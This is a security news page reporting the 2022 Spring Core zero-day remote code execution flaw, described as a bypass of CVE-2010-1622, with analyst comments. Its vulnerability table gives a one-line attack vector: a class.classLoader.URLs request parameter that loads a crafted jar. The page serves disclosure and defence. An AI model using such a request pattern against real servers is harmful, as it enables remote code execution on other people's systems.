Security News > 2022 > March > Unpatched Java Spring Framework 0-Day RCE Bug Threatens Enterprise Web Apps Security
A zero-day remote code execution vulnerability has come to light in the Spring framework shortly after a Chinese security researcher briefly leaked a proof-of-concept exploit on GitHub before deleting their account.
According to cybersecurity firm Praetorian, the unpatched flaw impacts Spring Core on Java Development Kit versions 9 and later and is a bypass for another vulnerability tracked as CVE-2010-1622, enabling an unauthenticated attacker to execute arbitrary code on the target system.
Spring is a software framework for building Java applications, including web apps on top of the Java EE platform.
It's worth noting that the flaw targeted by the zero-day exploit is different from two previous vulnerabilities disclosed in the Spring framework this week, including the Spring Framework expression DoS vulnerability and the Spring Cloud expression resource access vulnerability.
Initial analysis of the new code execution flaw in Spring Core suggests that its impact may not be severe.
"[C]urrent information suggests in order to exploit the vulnerability, attackers will have to locate and identify web app instances that actually use the DeserializationUtils, something already known by developers to be dangerous," Flashpoint said in an independent analysis.
News URL
https://thehackernews.com/2022/03/unpatched-java-spring-framework-0-day.html
Related news
- Enhancing national security: The four pillars of the National Framework for Action (source)
- Week in review: Fortinet patches critical FortiManager 0-day, VMware fixes vCenter Server RCE (source)
- AI’s impact on the future of web application security (source)
- Here's what happens if you don't layer network security – or remove unused web shells (source)
Related Vulnerability
DATE | CVE | VULNERABILITY TITLE | RISK |
---|---|---|---|
2010-06-21 | CVE-2010-1622 | Code Injection vulnerability in multiple products SpringSource Spring Framework 2.5.x before 2.5.6.SEC02, 2.5.7 before 2.5.7.SR01, and 3.0.x before 3.0.3 allows remote attackers to execute arbitrary code via an HTTP request containing class.classLoader.URLs[0]=jar: followed by a URL of a crafted .jar file. | 0.0 |